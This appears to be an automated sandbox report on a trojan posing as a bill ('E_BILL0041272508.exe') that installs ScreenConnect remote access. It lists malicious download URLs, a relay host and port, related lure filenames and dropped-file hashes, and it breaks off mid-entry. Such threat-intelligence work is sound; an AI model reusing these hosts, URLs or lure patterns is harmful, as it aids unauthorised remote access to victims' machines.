                                                    https://otohelp.top/Bin/ScreenConnect.Client.application?e=E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://otohelp.top/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000002.00000002.4003051515.0000023CE60C6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385887426.000000001AE30000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2383915676.00000000006AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://otohelp.top/Bin/ScreenConnect.Client.applicationTzdfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://otohelp.top/Bin/ScreenConnect.Client.applicationcdfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://otohelp.top/Bin/ScreenConnect.Client.application.tio&ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.edfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://ocsp.dignE_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                  https://otohelp.top/Bin/ScreenConnect.Client.application$Edfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://otohelp.top/Bin/ScreenConnect.Client.manifestllTdfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.w3.ordfsvc.exe, 00000002.00000002.3991111838.0000023CCC569000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC5CF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.2142326938.0000027458100000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                          unknown
                                                                          http://crl.ver)svchost.exe, 00000004.00000002.3767047379.0000027458200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&AYPVIQNL.log.2.drfalse
                                                                              unknown
                                                                              https://otohelp.top/Bin/ScreenConnect.Client.manifestqdfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://otohelp.top/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                                                https://g.live.com/odclientsettings/Prod1C:edb.log.4.drfalse
                                                                                  unknown
                                                                                  https://otohelp.top/Bin/ScreenConnect.WindowsFileManagdfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://otohelp.top/Bin/ScreenConnect.Client.applicationml%%ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.2.drfalse
                                                                                        unknown
                                                                                        https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeLMEMHdfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://otohelp.top/Bin/ScreenConnect.WindowsCdfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configZaB_dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://otohelp.top/Bin/ScreenConnect.ClientSedfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe0dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  79.110.49.16
                                                                                                  mmf351.ddns.netGermany
                                                                                                  57287OTAVANET-ASCZtrue
                                                                                                  IP
                                                                                                  127.0.0.1
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1523876
                                                                                                  Start date and time:2024-10-02 06:24:20 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 8m 17s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Run name:Run with higher sleep bypass
                                                                                                  Number of analysed new started processes analysed:11
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:E_BILL0041272508.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal72.troj.evad.winEXE@11/68@3/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 83.3%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 67%
                                                                                                  • Number of executed functions: 228
                                                                                                  • Number of non-executed functions: 25
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 192.229.221.95, 93.184.221.240
                                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                  • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 1340 because it is empty
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  TimeTypeDescription
                                                                                                  00:25:34API Interceptor5263093x Sleep call for process: dfsvc.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  79.110.49.16E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                    invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          D3NM6xht1m.elfGet hashmaliciousUnknownBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            otohelp.topE_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            mmf351.ddns.netinvoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            fp2e7a.wpc.phicdn.netScan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 192.229.221.95
                                                                                                            E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 192.229.221.95
                                                                                                            Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 192.229.221.95
                                                                                                            https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 192.229.221.95
                                                                                                            http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_urlGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            http://racrodisaver.co.in/Get hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            OTAVANET-ASCZE_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.196
                                                                                                            UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            mrKs8EKXbz.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.196
                                                                                                            7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.196
                                                                                                            Statement.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.42
                                                                                                            bin homebots io.batGet hashmaliciousUnknownBrowse
                                                                                                            • 79.110.49.144
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eScan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                            • 79.110.49.16
                                                                                                            c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                            • 79.110.49.16
                                                                                                            Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 79.110.49.16
                                                                                                            404.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 79.110.49.16
                                                                                                            jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 79.110.49.16
                                                                                                            NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • 79.110.49.16
                                                                                                            e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 79.110.49.16
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeScan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                  Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                      Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                        He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                            VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeScan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                  Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                    Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                        Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                            5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                              VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8192
                                                                                                                                                Entropy (8bit):0.35901589905449205
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
                                                                                                                                                MD5:C788EDB928436D0CE10A5BF198837D8A
                                                                                                                                                SHA1:F104B6AB797E0B16362BFB69F5000407CE6EFFD8
                                                                                                                                                SHA-256:E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
                                                                                                                                                SHA-512:61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.7304198281847039
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH03:9JZj5MiKNnNhoxuC
                                                                                                                                                MD5:CF5C187095946D3CECEBF5DC8DE00B25
                                                                                                                                                SHA1:86767DFAE9E16A69102E8DCEC5AE25D7A8B121A6
                                                                                                                                                SHA-256:BDD291D4C0C5937569DB54A40F2B85F730E22A05E27D3ABC17B32E94D712AACD
                                                                                                                                                SHA-512:4438F4DF13F556D3C83F368BA3E5C98DEAB54B283AEB876C60AB5E78840502D9BD364CEA0DB4C225091B5311453F0C56887201A4AB53C09CB94646C6517D883C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x4e1f490b, page size 16384, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.6291147950443163
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:HSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Haza9iJa+2UtmOQOL
                                                                                                                                                MD5:29809A948B3040D6084ECFC43CDA01D0
                                                                                                                                                SHA1:6D273F7E68225B76FDB2DEAF21577C673530DCA4
                                                                                                                                                SHA-256:79DB1CF0BD007DA239E46799B7EBE724D9A5D39E31904BE3CE98786BE760E0C7
                                                                                                                                                SHA-512:46069BF47AB84859C166DF45AE8F71BFD25BE5B4EE0965ED7D43A68BE24D760F2718D44B1419AA08C31F66FCB067AE66EE7711F2C2D4A13E5784FC2E6FBE3FC0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:N.I.... .......P.......X\...;...{......................0.j..........|.......|?.h.g..........|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................U.......|..................f..?.....|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.08011597908142432
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:FlllWetYeewB4i8/PdzpmPv8/illHol///lZMPCyH:FtTzRdPxpo5
                                                                                                                                                MD5:F8ED7BCFB9C6713E7413EDD6FA58A83B
                                                                                                                                                SHA1:80CC793252821AEF2E805D7D45DA760FEEC32375
                                                                                                                                                SHA-256:4077ED26CA7A8FE1F9C9A7296637B8F0C4F6DEB8B94E6C9B896EC69934747C6D
                                                                                                                                                SHA-512:46562005865A37C493AA83C3BDC94B7CFAB0E5448E762F2A18AA91CAC11D64BDCE7875851865CDA7EEDA85E86FA849F40E00428746C2FBAF2408AE986E12AC04
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.O.#.....................................;...{.......|?......|...............|.......|..<bW......|q.................f..?.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):71954
                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1716
                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):727
                                                                                                                                                Entropy (8bit):7.552295515462603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0...*.H.............X.Z..hT.F...^.g..n......W.%T.;~.|LU.......aCW...[....-.k.*F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..*1.4.....U.x}n..F....g..|.......P.|...G......:.F.w,....mj.kj>..2=9.*.Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p|5.6....KN..p.6y..\K........:.T.......q.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1428
                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
